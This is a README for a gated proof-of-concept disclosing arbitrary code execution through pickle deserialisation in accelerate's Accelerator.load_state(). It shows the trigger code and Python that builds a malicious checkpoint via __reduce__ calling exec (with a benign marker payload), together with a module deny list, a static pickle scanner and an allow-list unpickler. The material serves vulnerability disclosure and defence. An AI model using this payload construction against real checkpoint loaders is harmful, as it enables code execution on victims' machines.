Security PoC — gated for review
This repository hosts a proof-of-concept malicious checkpoint for a coordinated huntr.com vulnerability disclosure. Access is restricted to security reviewers.
huggingface/accelerate Accelerator.load_state() — pickle RCE (PoC)
Proof-of-concept for a coordinated huntr.com disclosure against huggingface/accelerate.
custom_checkpoint_0.pkl is a crafted accelerate custom-state checkpoint: the file load_state() reads for the first object registered with register_for_checkpointing().
Resuming through the public API:
from accelerate import Accelerator
class State:  # any object exposing state_dict()/load_state_dict() can be registered
    def state_dict(self): return {}
    def load_state_dict(self, d): pass
acc = Accelerator(); acc.register_for_checkpointing(State())
acc.load_state("<dir containing custom_checkpoint_0.pkl>")  # RCE: payload runs inside torch.load
triggers arbitrary OS command execution: load_state() →
load_custom_state() → torch.load(..., weights_only=False)
(src/accelerate/checkpointing.py), which unpickles the file and honors
__reduce__, so any callable named in the checkpoint runs at load time, before
the registered object's load_state_dict() is ever called. Vulnerable on every
torch version: weights_only=False is passed explicitly, so the safer
weights_only=True default torch has shipped since 2.6 does not apply.
The bundled payload is benign — runs id, writes /tmp/accelerate_pwned.txt.
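The mechanism behind the chain above and a pre-load check a reviewer can run on custom_checkpoint_0.pkl, as an added example. This is neither the gated checkpoint nor accelerate's code: the payload is a constructed, benign stand-in (builtins.exec writing a marker file in a temp dir, instead of the PoC's id/echo command), the deny list of modules and the allow list in the unpickler are illustrative assumptions, and the static scanner is a heuristic built on pickletools rather than a tool the project ships.

```python
# Added example for this README; not the gated checkpoint and not accelerate's code.
import io
import os
import pickle
import pickletools
import tempfile


class MarkerPayload:
    """Constructed stand-in for a malicious custom-state object: pickle stores
    whatever __reduce__ returns (callable + args) and the unpickler calls it on
    load. The PoC runs a shell command; this uses builtins.exec to write a marker."""

    def __init__(self, marker_path: str):
        self.marker_path = marker_path

    def __reduce__(self):
        return (exec, (f"open({self.marker_path!r}, 'w').write('pwned')",))


def build_checkpoint(path: str, marker_path: str, protocol: int = 4) -> bytes:
    """Write a custom_checkpoint_0.pkl-style pickle; return its bytes."""
    data = pickle.dumps(MarkerPayload(marker_path), protocol=protocol)
    with open(path, "wb") as f:
        f.write(data)
    return data


# Illustrative deny list (an assumption, not accelerate's). Spelling matters:
# os.system pickles as posix.system (Linux) or nt.system (Windows), and
# protocols 0-2 write builtins as __builtin__.
DANGEROUS_MODULES = {"os", "posix", "nt", "subprocess", "builtins", "__builtin__",
                     "sys", "shutil", "socket", "runpy", "importlib", "codecs"}


def referenced_globals(data: bytes) -> list[str]:
    """Static scan (no unpickling) of every global the pickle would import.
    GLOBAL (protocols 0-3) carries "module name" inline; STACK_GLOBAL (4+)
    pops both from the stack, so string pushes and the memo are tracked.
    The stack model is partial: confirm hits with pickletools.dis."""
    found, stack, memo = [], [], {}
    for op, arg, _ in pickletools.genops(data):
        if op.name in ("SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
                       "STRING", "SHORT_BINSTRING", "BINSTRING"):
            stack.append(arg)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = stack[-1] if stack else None
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = stack[-1] if stack else None
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            stack.append(memo.get(arg))
        elif op.name == "GLOBAL":
            found.append(arg.replace(" ", ".", 1))
        elif op.name == "STACK_GLOBAL":
            name = stack.pop() if stack else "?"
            module = stack.pop() if stack else "?"
            found.append(f"{module}.{name}")
    return found


def dangerous_globals(data: bytes) -> list[str]:
    """Referenced globals whose top-level module is on the deny list."""
    return [g for g in referenced_globals(data)
            if g.split(".", 1)[0] in DANGEROUS_MODULES]


class RestrictedUnpickler(pickle.Unpickler):
    """Allow-list unpickler (the idea behind weights_only=True, which
    load_custom_state() opts out of). The allow list is illustrative."""
    ALLOWED = {("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing global {module}.{name}")


def restricted_load(data: bytes):
    """Return (True, obj) or (False, reason); never runs file-chosen code."""
    try:
        return True, RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as e:
        return False, str(e)


def demo() -> dict:
    """Build, scan, and load the stand-in both ways; report what happened."""
    with tempfile.TemporaryDirectory() as d:
        ckpt = os.path.join(d, "custom_checkpoint_0.pkl")
        marker = os.path.join(d, "pwned.txt")
        data = build_checkpoint(ckpt, marker)
        flagged = dangerous_globals(data)
        flagged_proto2 = dangerous_globals(pickle.dumps(MarkerPayload(marker), protocol=2))
        ok, _ = restricted_load(data)
        marker_after_restricted = os.path.exists(marker)
        with open(ckpt, "rb") as f:
            pickle.load(f)  # what weights_only=False amounts to: exec() runs here
        marker_after_unsafe = os.path.exists(marker)
    benign = pickle.dumps({"step": 3}, protocol=4)  # constructed clean state
    return {"flagged": flagged, "flagged_proto2": flagged_proto2, "restricted_ok": ok,
            "marker_after_restricted": marker_after_restricted,
            "marker_after_unsafe": marker_after_unsafe,
            "benign_flagged": dangerous_globals(benign),
            "benign_load": restricted_load(benign)}
```

Calling demo() shows the three outcomes side by side: the scanner names builtins.exec (or __builtin__.exec for an older protocol) before anything is loaded, the allow-list unpickler refuses the file and no marker appears, and a plain load, which is what weights_only=False amounts to, writes the marker. Run referenced_globals() over a real custom_checkpoint_0.pkl before resuming a checkpoint from an untrusted source, and treat any hit as a reason to stop rather than a result to interpret.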
Gated (manual approval) so the PoC is not freely downloadable; access granted to huntr's reviewer (protectai-bot).